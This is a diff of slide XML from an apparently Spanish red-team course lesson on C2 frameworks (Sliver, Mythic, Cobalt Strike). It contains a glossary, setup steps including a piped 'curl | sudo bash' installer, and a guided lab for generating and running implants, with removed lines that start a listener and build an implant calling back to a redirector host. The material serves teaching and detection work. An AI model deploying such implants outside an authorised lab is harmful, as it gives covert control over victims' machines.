+              <a:t>•  Stager vs stageless: descarga por fases vs payload completo. Característica: stager es pequeño pero hace una petición extra observable.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Beacon (Cobalt Strike): implante de referencia con jitter y sleep configurables. Característica: define el estándar que muchos EDR detectan.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  C2 profile: define cómo se ve el tráfico (Sliver/Mythic tienen equivalentes al Malleable de CS). Característica: clave para el sigilo.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Jitter / sleep: variación aleatoria del intervalo de check-in. Característica: dificulta la detección por periodicidad (beaconing).</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4390,7 +4766,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧪 Laboratorio guiado</a:t>
+              <a:t>📔 Glosario</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4428,97 +4804,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Instala Sliver y entra en la consola:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  sliver</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  sliver &gt; https --lhost 0.0.0.0 --lport 443   # levanta un listener HTTPS</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Genera un implante:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  sliver &gt; generate --http tu-redirector.lab --os windows --arch amd64 --save /tmp/</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Entrega el binario a una VM Windows de tu lab y ejecútalo.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Interactúa con la sesión:</a:t>
+              <a:t>•  Término — Definición concisa</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  C2 framework — Plataforma que genera implantes y gestiona sesiones</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Listener — Servicio que espera conexiones de implantes</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Implante / agente — Código que corre en la víctima y llama a casa</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Beacon — Implante que hace check-in a intervalos con jitter</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Sesión — Control interactivo del operador sobre un implante</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Stager — Payload pequeño que descarga el implante completo</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4569,7 +4945,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>✍️ Ejercicios</a:t>
+              <a:t>🧰 Herramientas y preparación</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4607,82 +4983,67 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Explica la diferencia entre sesión interactiva y beacon con un caso de uso para cada una.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Genera dos implantes Sliver (HTTPS y mTLS) y compara su tráfico.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Instala un agente en Mythic y lista sus comandos disponibles.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Configura jitter alto y mide cómo cambia el patrón de check-in.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Elabora una tabla comparativa Cobalt Strike vs Sliver vs Mythic (licencia, canales, extensibilidad).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Lista 5 IOCs por defecto de Sliver que un SOC podría alertar.</a:t>
+              <a:t>•  Sliver: curl https://sliver.sh/install | sudo bash (o binarios del release en GitHub).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Mythic: Docker + git clone https://github.com/its-a-feature/Mythic &amp;&amp; ./mythic-cli start.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Cobalt Strike es comercial y licenciado: aquí solo se estudia conceptualmente; no se distribuye ni se usan versiones pirateadas.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  La infraestructura de redirectores de la Clase 164 como front-end de los listeners.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  VMs Windows/Linux de laboratorio para desplegar implantes.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4733,7 +5094,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📝 Reto verificable</a:t>
+              <a:t>🧪 Laboratorio guiado</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4771,22 +5132,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Establece en tu laboratorio una sesión C2 con Sliver que atraviese el redirector de la Clase 164, configurada como beacon con jitter, y documenta al menos 4 IOCs que genera.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Criterio de aceptación: la sesión aparece en sliver &gt; sessions/beacons, el tráfico pasa por el redirector (el team server no es alcanzable directo desde la víctima) y presentas una lista de IOCs observados con la fuente de datos que los revelaría.</a:t>
+              <a:t>•  Instala Sliver y entra en la consola:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Genera un implante:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Entrega el binario a una VM Windows de tu lab y ejecútalo.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Interactúa con la sesión:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Ajusta sigilo: configura beacon con sleep y jitter:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Despliega Mythic con Docker y crea un operador; instala un agente (ej. Apollo o Poseidon) desde mythic-cli install github ....</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Compara telemetría. En la VM víctima observa procesos, conexiones (netstat) y, si tienes Sysmon (Parte 8), los eventos que generan Sliver vs Mythic.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
